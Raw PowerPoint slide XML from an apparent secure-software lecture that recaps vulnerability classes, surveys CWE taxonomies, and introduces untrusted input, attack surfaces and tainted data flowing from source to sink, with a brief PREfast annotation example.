              <a:t>u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t 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7030A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g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y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C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F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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7030A0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rgbClr val="7030A0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7030A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1124744"/>
            <a:ext cx="4034606" cy="5040560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m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p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r 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s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7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c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7030A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o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A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 o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A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 X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M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7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a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y 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c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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X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v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>
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr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>
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr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89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CWE Top 924   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>[Nov 2021]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https://cwe.mitre.org/data/definitions/1000.html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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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8103" r="50" b="8362"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="751799" y="1106092"/>
            <a:ext cx="2167793" cy="41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0427" r="50" b="6233"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4959307" y="1124106"/>
            <a:ext cx="2167793" cy="41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4212" r="50" b="3081"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2780106" y="1150468"/>
            <a:ext cx="2167793" cy="41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7450" r="50" b="-240"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6976207" y="1160748"/>
            <a:ext cx="2167793" cy="41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5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Recap: before mid-term break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Security vulnerabilities we came across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Memory corruption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Integer overflow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Format string attacks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OS command injection  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>-  in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>PREfast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> example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int execute( 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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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SA_Pre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(Tainted=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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SA_No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)] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) { return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b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>); }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attacks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     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in Java, with Log4J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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Today &amp; next week: most other security vulnerabilities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180850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sadsd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30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7484" y="-367243"/>
            <a:ext cx="14098968" cy="759248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1116632" y="6509822"/>
            <a:ext cx="50812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http://cwe.mitre.org/data/pdf/1000_with_1344_colors.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1592197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Classifications of security flaws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062664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These classifications &amp; taxonomies are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>very useful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for awareness &amp; prevention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for understanding &amp; tackling root causes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>very messy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as you can classify flaws in different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>always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incomplete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there are always new &amp; more attacks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application-specific flaws will be missing in generic taxonomies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can be misleading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e.g. ‘lack of input validation’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9668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32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/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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2832222" y="3160594"/>
            <a:ext cx="1556307" cy="54030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/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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1023557" y="3145118"/>
            <a:ext cx="1052685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/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/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/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/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/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/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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2924931" y="1967312"/>
            <a:ext cx="1369656" cy="1068818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Many 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overlaps,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/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/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/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/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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23104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33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/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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2832222" y="3160594"/>
            <a:ext cx="1556307" cy="54030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/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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1023557" y="3145118"/>
            <a:ext cx="1052685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/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/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/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/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/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/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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2924931" y="1967312"/>
            <a:ext cx="1369656" cy="1068818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Many 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overlaps,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/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/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/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/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D9908-E1BF-F6DE-14E2-C0F08847C27F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="773317" y="3663719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        buggy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5CBC2F-FBC7-A3DA-9B1E-BE8197580AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3751322" y="3640335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unintended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     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78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3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0"/>
              <a:t>Tackling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="7200" baseline="-25000" dirty="0"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C0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/>
              <a:t>problems</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:b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34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120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observations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Most (all?) attacks involve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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US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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>which ends up in a place where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>processing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> it causes software to ‘go off the rails’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Input may be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>forwarded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> between systems to reach place where it does damage  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are there structural approach to combat these 100s of variants of input handling problems?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicParenR"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18824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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" alt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A31D9F-E20A-03D4-CE57-7ED8DC2FEAF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115616" y="1439464"/>
            <a:ext cx="6723983" cy="3416176"/>
            <a:chOff x="1277335" y="1653956"/>
            <a:chExt cx="6723983" cy="3416176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5069124" y="1793478"/>
              <a:ext cx="1301697" cy="1051578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Web</a:t>
              </a:r>
            </a:p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server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6699622" y="1653956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6900253" y="2331937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6699621" y="2843418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5079203" y="2438538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9707" name="Vrije vorm 20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="21378049">
              <a:off x="2507579" y="2517854"/>
              <a:ext cx="2915620" cy="2462905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5057078" y="411816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5152849" y="3393120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5059738" y="372877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4909357" y="4483303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166314" y="1999702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6760661" y="2883243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6943912" y="2386834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6740941" y="1877460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41" y="1884438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xplosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B49AB2F-D689-56A6-A2A2-1FAA4EE4973D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6670540" y="1793400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0245B2BA-2FDB-F68B-6970-547804D9A877}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6862235" y="2326869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4DD17A6F-991D-D5BA-090E-77536D734564}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6654231" y="2768584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6" name="Rechte verbindingslijn met pijl 2"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6225308" y="2766728"/>
              <a:ext cx="573147" cy="21571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240968" y="2478059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77FCD6-7623-8979-B817-77745D55B0DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="5317139"/>
            <a:ext cx="655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Big attack surface in application, the underlying protocol stack, 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and external services.</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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329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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-N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133CD-CA8D-6507-C23F-5605251457BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1259632" y="1358826"/>
            <a:ext cx="6163581" cy="4024658"/>
            <a:chOff x="510309" y="1045474"/>
            <a:chExt cx="6163581" cy="4024658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Wifi</a:t>
              </a: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/ 4G  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1499274" y="414684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1510572" y="3402429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1482627" y="379873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1831728" y="4551381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1372844" y="1766701"/>
              <a:ext cx="1301697" cy="993434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App or  browser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3003342" y="1569035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3203973" y="2247016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3003341" y="2758497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1507724" y="2404501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1" name="Afgeronde rechthoek 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{465EED6F-4678-B2B1-A174-C2AD4BBF4C33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2192246" y="1045474"/>
              <a:ext cx="1724754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HTML renderer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12" name="Rechte verbindingslijn met pijl 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4341A659-7A7E-2DEB-F2F6-5EEB42B27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42042" y="1359102"/>
              <a:ext cx="66812" cy="4385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fgeronde rechthoek 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8A1073A-D2AC-32EE-E328-48F5682ABC78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="510309" y="1128338"/>
              <a:ext cx="1293023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PDF viewer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Explosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E260BCA-8174-D202-E555-6BD3C0181FA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="949019" y="1359103"/>
              <a:ext cx="573060" cy="240455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10" name="Rechte verbindingslijn met pijl 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{670F8074-92B7-7849-5C7F-CEF78B4470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15278" y="1426081"/>
              <a:ext cx="315130" cy="47780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3064381" y="2798322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3247632" y="2301913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3044661" y="1792539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7C5F6F3-09FB-E618-E8ED-8DA122593D39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipV="1">
              <a:off x="2275448" y="1080291"/>
              <a:ext cx="210528" cy="269277"/>
              <a:chOff x="8622963" y="2505809"/>
              <a:chExt cx="232092" cy="305321"/>
            </a:xfrm>
          </p:grpSpPr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59A80BE1-736C-9D7D-FF18-1490EC3F6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66647954-61E3-7E98-68F0-41FBD0BC4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131" y="1753121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Vrije vorm 20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="223311" flipH="1">
              <a:off x="1735241" y="2420184"/>
              <a:ext cx="3735742" cy="2557326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FA19B3B5-594C-DCC6-7D96-A38949D4CC31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2311563" y="126049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12D723ED-ADA1-C6E0-BC7B-87F1DA1A2836}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2905157" y="1776521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" name="Explosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D268713-A3A2-8609-65A1-0CF4C6DE6FA2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3118548" y="2265345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7" name="Explosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5347196-19E4-6B67-581B-DC2029683211}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2937418" y="277364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470034" y="1914781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544688" y="2393138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Rechte verbindingslijn met pijl 2"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="17" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2529028" y="2681807"/>
              <a:ext cx="529751" cy="24183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95319A8-F634-597A-E184-68C07CEBB91C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="810519" y="5663636"/>
            <a:ext cx="3455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Typical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>client-side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attack surface</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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fgeronde rechthoek 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C246D3-5AF6-143A-DB55-0E7012455A73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="565457" y="2042496"/>
            <a:ext cx="1293023" cy="370041"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AAE97B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45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MS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="145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Offuce</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="145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Explosie 2 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735B60CE-AD7C-0E3E-6EA1-6BE2D2F65270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1508078" y="2197317"/>
            <a:ext cx="573060" cy="240455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0" rIns="91422" bIns="45710"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="492023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 sz="1633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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Rechte verbindingslijn met pijl 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA55336-1883-B0B6-2DA3-32F97AEAFC1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73907" y="2247163"/>
            <a:ext cx="558043" cy="24774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0115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6"/>
            <a:ext cx="7761288" cy="603370"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terminology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Untrusted input travels as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tainted data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sink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Sinks can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>external API or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rgbClr val="CC66FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>internal function 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>
                <a:solidFill>
                  <a:srgbClr val="CC66FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bug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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Afgeronde rechthoek 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3047348" y="1709366"/>
            <a:ext cx="3039066" cy="262113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334747" y="1756345"/>
            <a:ext cx="104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source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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6816073" y="2193900"/>
            <a:ext cx="1552518" cy="8825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7" name="Explosie 2 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6503023" y="2377544"/>
            <a:ext cx="698614" cy="382384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9078"/>
            <a:ext cx="774968" cy="7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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1988401" y="2210030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575986" y="2495157"/>
            <a:ext cx="1517522" cy="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2" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6167243" y="2437598"/>
            <a:ext cx="713652" cy="3823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404937" y="2550323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3061203" y="4641250"/>
            <a:ext cx="3053225" cy="49243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Platform libraries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846219" y="20531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sink</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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985530" y="2059787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015897" y="2414820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814313" y="4247913"/>
            <a:ext cx="497629" cy="14582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3" name="Explosie 2 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3746701" y="4538311"/>
            <a:ext cx="698614" cy="262693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" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3915174" y="4311639"/>
            <a:ext cx="301461" cy="4455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3991127" y="4417026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5162348" y="3484062"/>
            <a:ext cx="151346" cy="514512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC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1" name="Vrije vorm 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3089349" y="3152140"/>
            <a:ext cx="1314705" cy="1178358"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1724779"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1228507"/>
              <a:gd name="connsiteX1" fmla="*/ 265246 w 1724779"/>
              <a:gd name="connsiteY1" fmla="*/ 314107 h 1228507"/>
              <a:gd name="connsiteX2" fmla="*/ 307127 w 1724779"/>
              <a:gd name="connsiteY2" fmla="*/ 823658 h 1228507"/>
              <a:gd name="connsiteX3" fmla="*/ 572373 w 1724779"/>
              <a:gd name="connsiteY3" fmla="*/ 893459 h 1228507"/>
              <a:gd name="connsiteX4" fmla="*/ 984202 w 1724779"/>
              <a:gd name="connsiteY4" fmla="*/ 642174 h 1228507"/>
              <a:gd name="connsiteX5" fmla="*/ 760837 w 1724779"/>
              <a:gd name="connsiteY5" fmla="*/ 390888 h 1228507"/>
              <a:gd name="connsiteX6" fmla="*/ 1284348 w 1724779"/>
              <a:gd name="connsiteY6" fmla="*/ 349007 h 1228507"/>
              <a:gd name="connsiteX7" fmla="*/ 1724098 w 1724779"/>
              <a:gd name="connsiteY7" fmla="*/ 530491 h 1228507"/>
              <a:gd name="connsiteX8" fmla="*/ 1382070 w 1724779"/>
              <a:gd name="connsiteY8" fmla="*/ 663114 h 1228507"/>
              <a:gd name="connsiteX9" fmla="*/ 1256428 w 1724779"/>
              <a:gd name="connsiteY9" fmla="*/ 949301 h 1228507"/>
              <a:gd name="connsiteX10" fmla="*/ 1249447 w 1724779"/>
